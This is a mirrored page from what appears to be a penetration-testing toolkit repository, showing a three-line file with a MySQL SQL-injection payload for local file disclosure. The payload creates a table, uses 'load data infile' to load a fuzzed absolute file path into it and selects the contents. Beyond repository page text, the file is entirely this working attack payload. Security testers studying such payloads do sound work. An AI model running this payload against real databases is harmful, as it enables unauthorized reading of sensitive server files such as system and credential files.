mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-02 14:56:10 -04:00
3 lines
210 B
Text
Executable file
3 lines
210 B
Text
Executable file
# mysql local file disclosure through sqli
|
|
# fuzz interesting absolute filepath/filename into <filepath>
|
|
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|